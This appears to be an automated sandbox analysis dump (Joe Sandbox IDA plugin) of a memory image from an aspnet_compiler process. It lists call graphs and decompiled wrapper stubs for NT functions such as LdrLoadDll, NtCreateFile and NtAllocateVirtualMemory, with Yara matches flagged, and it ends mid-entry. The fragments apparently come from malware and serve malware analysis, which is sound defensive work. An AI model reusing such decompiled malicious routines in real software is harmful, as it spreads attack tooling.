33312->33425 33314 419410 33314->33244 33315 4193e7 33315->33314 33316 413070 3 API calls 33315->33316 33318 419409 33316->33318 33318->33314 33457 4143a0 33318->33457 33319 41949a 33320 4194aa 33319->33320 33551 419190 LdrLoadDll 33319->33551 33467 419000 33320->33467 33323 4194d8 33546 418150 33323->33546 33327 4191f0 LdrLoadDll 33326->33327 33328 4181ac 33327->33328 33580 143967a 33328->33580 33329 4181c7 33331 41a0b0 33329->33331 33583 418900 33331->33583 33333 4195e9 33333->33207 33335 413b54 33334->33335 33336 4191f0 LdrLoadDll 33334->33336 33335->33274 33335->33275 33335->33278 33336->33335 33338 41860c NtCreateFile 33337->33338 33339 4191f0 LdrLoadDll 33337->33339 33338->33279 33339->33338 33342 41371c 33341->33342 33343 418570 LdrLoadDll 33342->33343 33344 41373d 33343->33344 33345 413744 33344->33345 33346 413758 33344->33346 33347 418720 2 API calls 33345->33347 33348 418720 2 API calls 33346->33348 33350 41374d 33347->33350 33349 413761 33348->33349 33405 41a2c0 LdrLoadDll RtlAllocateHeap 33349->33405 33350->33303 33352 41376c 33352->33303 33354 41346b 33353->33354 33355 41349e 33353->33355 33357 418570 LdrLoadDll 33354->33357 33356 4135e9 33355->33356 33361 4134ba 33355->33361 33358 418570 LdrLoadDll 33356->33358 33359 413486 33357->33359 33363 413604 33358->33363 33360 418720 2 API calls 33359->33360 33362 41348f 33360->33362 33364 418570 LdrLoadDll 33361->33364 33362->33306 33418 4185b0 LdrLoadDll 33363->33418 33365 4134d5 33364->33365 33367 4134f1 33365->33367 33368 4134dc 33365->33368 33369 4134f6 33367->33369 33370 41350c 33367->33370 33372 418720 2 API calls 33368->33372 33374 418720 2 API calls 33369->33374 33381 413511 33370->33381 33406 41a280 33370->33406 33371 41363e 33375 418720 2 API calls 33371->33375 33373 4134e5 33372->33373 33373->33306 33377 4134ff 33374->33377 33376 413649 33375->33376 33376->33306 33377->33306 33380 413577 33382 41358e 33380->33382 33417 418530 LdrLoadDll 33380->33417 33388 413523 33381->33388 33409 4186a0 33381->33409 33384 413595 33382->33384 33385 4135aa 33382->33385 33386 418720 2 API calls 33384->33386 33387 418720 2 API calls 33385->33387 33386->33388 33389 4135b3 33387->33389 33388->33306 33390 4135df 33389->33390 33412 419e80 33389->33412 33390->33306 33392 4135ca 33393 41a0b0 2 API calls 33392->33393 33394 4135d3 33393->33394 33394->33306 33395->33278 33396->33299 33398 413d24 33397->33398 33399 4191f0 LdrLoadDll 33397->33399 33400 4185b0 LdrLoadDll 33398->33400 33399->33398 33400->33302 33402 41873c NtClose 33401->33402 33403 4191f0 LdrLoadDll 33401->33403 33402->33307 33403->33402 33404->33287 33405->33352 33408 41a298 33406->33408 33419 4188c0 33406->33419 33408->33381 33410 4186bc NtReadFile 33409->33410 33411 4191f0 LdrLoadDll 33409->33411 33410->33380 33411->33410 33413 419ea4 33412->33413 33414 419e8d 33412->33414 33413->33392 33414->33413 33415 41a280 2 API calls 33414->33415 33416 419ebb 33415->33416 33416->33392 33417->33382 33418->33371 33420 4191f0 LdrLoadDll 33419->33420 33421 4188dc RtlAllocateHeap 33420->33421 33421->33408 33552 4187d0 33422->33552 33424 41a05d 33424->33312 33426 413081 33425->33426 33428 413089 33425->33428 33426->33315 33427 41335c 33427->33315 33428->33427 33556 41b260 33428->33556 33430 4130dd 33431 41b260 2 API calls 33430->33431 33435 4130e8 33431->33435 33432 413136 33434 41b260 2 API calls 33432->33434 33438 41314a 33434->33438 33435->33432 33436 41b390 3 API calls 33435->33436 33567 41b300 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33435->33567 33436->33435 33437 4131a7 33439 41b260 2 API calls 33437->33439 33438->33437 33561 41b390 33438->33561 33441 4131bd 33439->33441 33442 4131fa 33441->33442 33444 41b390 3 API calls 33441->33444 33443 41b260 2 API calls 33442->33443 33445 413205 33443->33445 33444->33441 33446 41b390 3 API calls 33445->33446 33452 41323f 33445->33452 33446->33445 33448 413334 33569 41b2c0 LdrLoadDll RtlFreeHeap 33448->33569 33450 41333e 33570 41b2c0 LdrLoadDll RtlFreeHeap 33450->33570 33568 41b2c0 LdrLoadDll RtlFreeHeap 33452->33568 33453 413348 33571 41b2c0 LdrLoadDll RtlFreeHeap 33453->33571 33455 413352 33572 41b2c0 LdrLoadDll RtlFreeHeap 33455->33572 33458 4143b1 33457->33458 33459 413a60 8 API calls 33458->33459 33461 4143c7 33459->33461 33460 41441a 33460->33319 33461->33460 33462 414402 33461->33462 33463 414415 33461->33463 33465 41a0b0 2 API calls 33462->33465 33464 41a0b0 2 API calls 33463->33464 33464->33460 33466 414407 33465->33466 33466->33319 33573 418ec0 33467->33573 33469 419014 33470 418ec0 LdrLoadDll 33469->33470 33471 41901d 33470->33471 33472 418ec0 LdrLoadDll 33471->33472 33473 419026 33472->33473 33474 418ec0 LdrLoadDll 33473->33474 33475 41902f 33474->33475 33476 418ec0 LdrLoadDll 33475->33476 33477 419038 33476->33477 33478 418ec0 LdrLoadDll 33477->33478 33479 419041 33478->33479 33480 418ec0 LdrLoadDll 33479->33480 33481 41904d 33480->33481 33482 418ec0 LdrLoadDll 33481->33482 33483 419056 33482->33483 33484 418ec0 LdrLoadDll 33483->33484 33485 41905f 33484->33485 33486 418ec0 LdrLoadDll 33485->33486 33487 419068 33486->33487 33488 418ec0 LdrLoadDll 33487->33488 33489 419071 33488->33489 33490 418ec0 LdrLoadDll 33489->33490 33491 41907a 33490->33491 33492 418ec0 LdrLoadDll 33491->33492 33493 419086 33492->33493 33494 418ec0 LdrLoadDll 33493->33494 33495 41908f 33494->33495 33496 418ec0 LdrLoadDll 33495->33496 33497 419098 33496->33497 33498 418ec0 LdrLoadDll 33497->33498 33499 4190a1 33498->33499 33500 418ec0 LdrLoadDll 33499->33500 33501 4190aa 33500->33501 33502 418ec0 LdrLoadDll 33501->33502 33503 4190b3 33502->33503 33504 418ec0 LdrLoadDll 33503->33504 33505 4190bf 33504->33505 33506 418ec0 LdrLoadDll 33505->33506 33507 4190c8 33506->33507 33508 418ec0 LdrLoadDll 33507->33508 33509 4190d1 33508->33509 33510 418ec0 LdrLoadDll 33509->33510 33511 4190da 33510->33511 33512 418ec0 LdrLoadDll 33511->33512 33513 4190e3 33512->33513 33514 418ec0 LdrLoadDll 33513->33514 33515 4190ec 33514->33515 33516 418ec0 LdrLoadDll 33515->33516 33517 4190f8 33516->33517 33518 418ec0 LdrLoadDll 33517->33518 33519 419101 33518->33519 33520 418ec0 LdrLoadDll 33519->33520 33521 41910a 33520->33521 33522 418ec0 LdrLoadDll 33521->33522 33523 419113 33522->33523 33524 418ec0 LdrLoadDll 33523->33524 33525 41911c 33524->33525 33526 418ec0 LdrLoadDll 33525->33526 33527 419125 33526->33527 33528 418ec0 LdrLoadDll 33527->33528 33529 419131 33528->33529 33530 418ec0 LdrLoadDll 33529->33530 33531 41913a 33530->33531 33532 418ec0 LdrLoadDll 33531->33532 33533 419143 33532->33533 33534 418ec0 LdrLoadDll 33533->33534 33535 41914c 33534->33535 33536 418ec0 LdrLoadDll 33535->33536 33537 419155 33536->33537 33538 418ec0 LdrLoadDll 33537->33538 33539 41915e 33538->33539 33540 418ec0 LdrLoadDll 33539->33540 33541 41916a 33540->33541 33542 418ec0 LdrLoadDll 33541->33542 33543 419173 33542->33543 33544 418ec0 LdrLoadDll 33543->33544 33545 41917c 33544->33545 33545->33323 33547 4191f0 LdrLoadDll 33546->33547 33548 41816c 33547->33548 33579 1439860 LdrInitializeThunk 33548->33579 33549 418183 33549->33244 33551->33320 33553 4187e6 33552->33553 33554 4191f0 LdrLoadDll 33553->33554 33555 4187ec NtAllocateVirtualMemory 33554->33555 33555->33424 33557 41b270 33556->33557 33558 41b276 33556->33558 33557->33430 33559 41a280 2 API calls 33558->33559 33560 41b29c 33559->33560 33560->33430 33562 41b300 33561->33562 33563 41b35d 33562->33563 33564 41a280 2 API calls 33562->33564 33563->33438 33565 41b33a 33564->33565 33566 41a0b0 2 API calls 33565->33566 33566->33563 33567->33435 33568->33448 33569->33450 33570->33453 33571->33455 33572->33427 33574 418edb 33573->33574 33575 413e60 LdrLoadDll 33574->33575 33576 418efb 33575->33576 33577 413e60 LdrLoadDll 33576->33577 33578 418fa7 33576->33578 33577->33578 33578->33469 33578->33578 33579->33549 33581 1439681 33580->33581 33582 143968f LdrInitializeThunk 33580->33582 33581->33329 33582->33329 33584 4191f0 LdrLoadDll 33583->33584 33585 41891c RtlFreeHeap 33584->33585 33585->33333 33587 406e40 33586->33587 33588 406e3b 33586->33588 33589 41a030 2 API calls 33587->33589 33588->33252 33592 406e65 33589->33592 33590 406ec8 33590->33252 33591 418150 2 API calls 33591->33592 33592->33590 33592->33591 33593 406ece 33592->33593 33597 41a030 2 API calls 33592->33597 33602 418850 33592->33602 33595 406ef4 33593->33595 33596 418850 2 API calls 33593->33596 33595->33252 33598 406ee5 33596->33598 33597->33592 33598->33252 33600 418850 2 API calls 33599->33600 33601 40710e 33600->33601 33601->33209 33603 4191f0 LdrLoadDll 33602->33603 33604 41886c 33603->33604 33607 14396e0 LdrInitializeThunk 33604->33607 33605 418883 33605->33592 33607->33605 33609 419853 33608->33609 33612 409b50 33609->33612 33611 408a8b 33611->33217 33614 409b74 33612->33614 33613 409b7b 33613->33611 33614->33613 33615 409bb0 LdrLoadDll 33614->33615 33616 409bc7 33614->33616 33615->33616 33616->33611 33618 409ec3 33617->33618 33620 409f40 33618->33620 33632 417f20 LdrLoadDll 33618->33632 33620->33222 33622 4191f0 LdrLoadDll 33621->33622 33623 40cfbb 33622->33623 33623->33230 33624 418a60 33623->33624 33625 418a7f LookupPrivilegeValueW 33624->33625 33626 4191f0 LdrLoadDll 33624->33626 33625->33226 33626->33625 33628 41850c 33627->33628 33629 4191f0 LdrLoadDll 33627->33629 33633 1439910 LdrInitializeThunk 33628->33633 33629->33628 33630 41852b 33630->33229 33632->33620 33633->33630 33635 40a047 33634->33635 33636 409ea0 LdrLoadDll 33635->33636 33637 40a076 33636->33637 33637->33152 33639 40d0aa 33638->33639 33647 40d160 33638->33647 33640 409ea0 LdrLoadDll 33639->33640 33641 40d0cc 33640->33641 33648 4181d0 33641->33648 33643 40d10e 33651 418210 33643->33651 33646 418720 2 API calls 33646->33647 33647->33155 33647->33156 33649 4181ec 33648->33649 33650 4191f0 LdrLoadDll 33648->33650 33649->33643 33650->33649 33652 4191f0 LdrLoadDll 33651->33652 33653 41822c 33652->33653 33656 1439fe0 LdrInitializeThunk 33653->33656 33654 40d154 33654->33646 33656->33654 33658 409cb1 33657->33658 33659 409cad 33657->33659 33660 409cfc 33658->33660 33661 409cca 33658->33661 33659->33167 33704 417f60 LdrLoadDll 33660->33704 33703 417f60 LdrLoadDll 33661->33703 33663 409d0d 33663->33167 33665 409cec 33665->33167 33667 40d210 3 API calls 33666->33667 33668 4133d6 33666->33668 33667->33668 33668->33169 33705 407720 33669->33705 33671 407a1d 33671->33171 33673 407720 19 API calls 33674 407a0a 33673->33674 33674->33671 33723 40d480 10 API calls 33674->33723 33677 4191f0 LdrLoadDll 33676->33677 33678 4187ac 33677->33678 33842 14398f0 LdrInitializeThunk 33678->33842 33679 40a782 33681 40d210 33679->33681 33682 40d22d 33681->33682 33843 418250 33682->33843 33685 40d275 33685->33175 33686 4182a0 2 API calls 33687 40d29e 33686->33687 33687->33175 33689 4182bc 33688->33689 33690 4191f0 LdrLoadDll 33688->33690 33849 1439780 LdrInitializeThunk 33689->33849 33690->33689 33691 40a7e5 33691->33181 33691->33184 33694 4191f0 LdrLoadDll 33693->33694 33695 41830c 33694->33695 33850 14397a0 LdrInitializeThunk 33695->33850 33696 40a8b9 33696->33192 33699 4191f0 LdrLoadDll 33698->33699 33700 4180cc 33699->33700 33851 1439a20 LdrInitializeThunk 33700->33851 33701 40a90c 33701->33196 33703->33665 33704->33663 33706 406e30 4 API calls 33705->33706 33708 40773a 33705->33708 33706->33708 33707 4079c9 33707->33671 33707->33673 33708->33707 33709 4079bf 33708->33709 33713 418190 2 API calls 33708->33713 33715 418720 LdrLoadDll NtClose 33708->33715 33718 40a920 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33708->33718 33721 4180b0 2 API calls 33708->33721 33724 417fa0 33708->33724 33727 407550 33708->33727 33739 40d360 LdrLoadDll NtClose 33708->33739 33740 418020 LdrLoadDll 33708->33740 33741 418050 LdrLoadDll 33708->33741 33742 4180e0 LdrLoadDll 33708->33742 33743 407320 33708->33743 33759 405ea0 LdrLoadDll 33708->33759 33710 4070f0 2 API calls 33709->33710 33710->33707 33713->33708 33715->33708 33718->33708 33721->33708 33723->33671 33725 4191f0 LdrLoadDll 33724->33725 33726 417fbc 33724->33726 33725->33726 33726->33708 33728 407566 33727->33728 33760 417b10 33728->33760 33730 40757f 33735 4076f1 33730->33735 33781 407130 33730->33781 33732 407665 33733 407320 11 API calls 33732->33733 33732->33735 33734 407693 33733->33734 33734->33735 33736 418190 2 API calls 33734->33736 33735->33708 33737 4076c8 33736->33737 33737->33735 33738 418790 2 API calls 33737->33738 33738->33735 33739->33708 33740->33708 33741->33708 33742->33708 33744 407349 33743->33744 33821 407290 33744->33821 33747 418790 2 API calls 33748 40735c 33747->33748 33748->33747 33749 4073e7 33748->33749 33752 4073e2 33748->33752 33829 40d3e0 33748->33829 33749->33708 33750 418720 2 API calls 33751 40741a 33750->33751 33751->33749 33753 417fa0 LdrLoadDll 33751->33753 33752->33750 33754 40747f 33753->33754 33754->33749 33833 417fe0 33754->33833 33756 4074e3 33756->33749 33757 413a60 8 API calls 33756->33757 33758 407538 33757->33758 33758->33708 33759->33708 33761 41a280 2 API calls 33760->33761 33762 417b27 33761->33762 33788 408170 33762->33788 33764 417b42 33765 417b80 33764->33765 33766 417b69 33764->33766 33769 41a030 2 API calls 33765->33769 33767 41a0b0 2 API calls 33766->33767 33768 417b76 33767->33768 33768->33730 33770 417bba 33769->33770 33771 41a030 2 API calls 33770->33771 33772 417bd3 33771->33772 33778 417e74 33772->33778 33794 41a070 33772->33794 33775 417e60 33776 41a0b0 2 API calls 33775->33776 33777 417e6a 33776->33777 33777->33730 33779 41a0b0 2 API calls 33778->33779 33780 417ec9 33779->33780 33780->33730 33782 40722f 33781->33782 33783 407145 33781->33783 33782->33732 33783->33782 33784 413a60 8 API calls 33783->33784 33785 4071b2 33784->33785 33786 41a0b0 2 API calls 33785->33786 33787 4071d9 33785->33787 33786->33787 33787->33732 33789 408195 33788->33789 33790 409b50 LdrLoadDll 33789->33790 33791 4081c8 33790->33791 33793 4081ed 33791->33793 33797 40b350 33791->33797 33793->33764 33815 418810 33794->33815 33798 40b37c 33797->33798 33799 418470 LdrLoadDll 33798->33799 33800 40b395 33799->33800 33801 40b39c 33800->33801 33808 4184b0 33800->33808 33801->33793 33805 40b3d7 33806 418720 2 API calls 33805->33806 33807 40b3fa 33806->33807 33807->33793 33809 4191f0 LdrLoadDll 33808->33809 33810 4184cc 33809->33810 33814 1439710 LdrInitializeThunk 33810->33814 33811 40b3bf 33811->33801 33813 418aa0 LdrLoadDll 33811->33813 33813->33805 33814->33811 33816 4191f0 LdrLoadDll 33815->33816 33817 41882c 33816->33817 33820 1439a00 LdrInitializeThunk 33817->33820 33818 417e59 33818->33775 33818->33778 33820->33818 33822 4072a8 33821->33822 33823 409b50 LdrLoadDll 33822->33823 33824 4072c3 33823->33824 33825 413e60 LdrLoadDll 33824->33825 33826 4072d3 33825->33826 33827 4072dc PostThreadMessageW 33826->33827 33828 4072f0 33826->33828 33827->33828 33828->33748 33830 40d3f3 33829->33830 33836 418120 33830->33836 33834 4191f0 LdrLoadDll 33833->33834 33835 417ffc 33834->33835 33835->33756 33837 41813c 33836->33837 33838 4191f0 LdrLoadDll 33836->33838 33841 1439840 LdrInitializeThunk 33837->33841 33838->33837 33839 40d41e 33839->33748 33841->33839 33842->33679 33844 4191f0 LdrLoadDll 33843->33844 33845 41826c 33844->33845 33848 14399a0 LdrInitializeThunk 33845->33848 33846 40d26e 33846->33685 33846->33686 33848->33846 33849->33691 33850->33696 33851->33701 33852 1439540 LdrInitializeThunk

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 41869f-4186e9 call 4191f0 NtReadFile
                          C-Code - Quality: 19%
                          			E0041869F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                          				void* _t18;
                          				void* _t27;
                          				void* _t28;
                          				intOrPtr* _t29;
                          				void* _t31;
                          
                          				asm("adc dl, [ebp-0x75]");
                          				_t13 = _a4;
                          				_t29 = _a4 + 0xc48;
                          				E004191F0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                          				_t4 =  &_a40; // 0x413a41
                          				_t18 =  *((intOrPtr*)( *_t29))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t28, _t31); // executed
                          				return _t18;
                          			}








                          0x0041869f
                          0x004186a3
                          0x004186af
                          0x004186b7
                          0x004186bc
                          0x004186e5
                          0x004186e9

                          APIs
                          • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID: A:A
                          • API String ID: 2738559852-2859176346
                          • Opcode ID: b16232513e9eb99dc49c572990310bea45ec1d8476615f1150cd98193f579f3b
                          • Instruction ID: eae1e8abcc01ab26ca39b003815499b54c9c0e62e5a06793086316f93d8aaac0
                          • Opcode Fuzzy Hash: b16232513e9eb99dc49c572990310bea45ec1d8476615f1150cd98193f579f3b
                          • Instruction Fuzzy Hash: A1F0F4B2200108AFCB14CF99CC91EEB77A9AF8C354F158248FE0DA7241C630E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3 4186a0-4186b6 4 4186bc-4186e9 NtReadFile 3->4 5 4186b7 call 4191f0 3->5 5->4
                          C-Code - Quality: 37%
                          			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                          				void* _t18;
                          				void* _t27;
                          				intOrPtr* _t28;
                          
                          				_t13 = _a4;
                          				_t28 = _a4 + 0xc48;
                          				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                          				_t4 =  &_a40; // 0x413a41
                          				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                          				return _t18;
                          			}






                          0x004186a3
                          0x004186af
                          0x004186b7
                          0x004186bc
                          0x004186e5
                          0x004186e9

                          APIs
                          • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID: A:A
                          • API String ID: 2738559852-2859176346
                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                          • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                          • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 219 409b50-409b6c 220 409b74-409b79 219->220 221 409b6f call 41af80 219->221 222 409b7b-409b7e 220->222 223 409b7f-409b8d call 41b3a0 220->223 221->220 226 409b9d-409bae call 419730 223->226 227 409b8f-409b9a call 41b620 223->227 232 409bb0-409bc4 LdrLoadDll 226->232 233 409bc7-409bca 226->233 227->226 232->233
                          C-Code - Quality: 100%
                          			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
                          				char* _v8;
                          				struct _EXCEPTION_RECORD _v12;
                          				struct _OBJDIR_INFORMATION _v16;
                          				char _v536;
                          				void* _t15;
                          				struct _OBJDIR_INFORMATION _t17;
                          				struct _OBJDIR_INFORMATION _t18;
                          				void* _t30;
                          				void* _t31;
                          				void* _t32;
                          
                          				_v8 =  &_v536;
                          				_t15 = E0041AF80( &_v12, 0x104, _a8);
                          				_t31 = _t30 + 0xc;
                          				if(_t15 != 0) {
                          					_t17 = E0041B3A0(__eflags, _v8);
                          					_t32 = _t31 + 4;
                          					__eflags = _t17;
                          					if(_t17 != 0) {
                          						E0041B620( &_v12, 0);
                          						_t32 = _t32 + 8;
                          					}
                          					_t18 = E00419730(_v8);
                          					_v16 = _t18;
                          					__eflags = _t18;
                          					if(_t18 == 0) {
                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                          						return _v16;
                          					}
                          					return _t18;
                          				} else {
                          					return _t15;
                          				}
                          			}













                          0x00409b6c
                          0x00409b6f
                          0x00409b74
                          0x00409b79
                          0x00409b83
                          0x00409b88
                          0x00409b8b
                          0x00409b8d
                          0x00409b95
                          0x00409b9a
                          0x00409b9a
                          0x00409ba1
                          0x00409ba9
                          0x00409bac
                          0x00409bae
                          0x00409bc2
                          0x00000000
                          0x00409bc4
                          0x00409bca
                          0x00409b7e
                          0x00409b7e
                          0x00409b7e

                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 234 4185ec-418641 call 4191f0 NtCreateFile
                          C-Code - Quality: 100%
                          			E004185EC(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                          				long _t24;
                          
                          				_t18 = _a4;
                          				_t5 = _t18 + 0xc40; // 0xc40
                          				E004191F0(0xec8b5511, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                          				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                          				return _t24;
                          			}




                          0x004185f3
                          0x004185ff
                          0x00418607
                          0x0041863d
                          0x00418641

                          APIs
                          • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 77496bb4c88643bcccb2117ca3c7cc5c0cf276be3ff1de27c64ddddb5173607e
                          • Instruction ID: fe44a67732a5b26b0616b30bdd44be437633e8c3622eeb6186f88684faceb0e7
                          • Opcode Fuzzy Hash: 77496bb4c88643bcccb2117ca3c7cc5c0cf276be3ff1de27c64ddddb5173607e
                          • Instruction Fuzzy Hash: 31F0B2B6200108ABCB08CF88DC94EEB37A9AF8C354F158248FA0DA7241C630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 238 4185f0-418606 239 41860c-418641 NtCreateFile 238->239 240 418607 call 4191f0 238->240 240->239
                          C-Code - Quality: 100%
                          			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                          				long _t21;
                          				void* _t31;
                          
                          				_t3 = _a4 + 0xc40; // 0xc40
                          				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                          				return _t21;
                          			}





                          0x004185ff
                          0x00418607
                          0x0041863d
                          0x00418641

                          APIs
                          • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                          • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                          • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 242 4187ca-4187ce 243 4187d0-4187e5 242->243 244 4187e6-41880d call 4191f0 NtAllocateVirtualMemory 242->244 243->244
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: f6e01f958da6f5887af5bce7f9ff34f58966f17e7ffe06d50aec4c245cb050cb
                          • Instruction ID: c0309995d2aad19eb9d7e548a65d5f7951beaca775a177e06ef3c88e4de00aa1
                          • Opcode Fuzzy Hash: f6e01f958da6f5887af5bce7f9ff34f58966f17e7ffe06d50aec4c245cb050cb
                          • Instruction Fuzzy Hash: 1BF0F8B1204208AFDB14DF89DC81EEB77ADAF88754F118559FE18A7242C635E854CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 247 4187d0-41880d call 4191f0 NtAllocateVirtualMemory
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                          • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                          • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                          Memory Dump Source
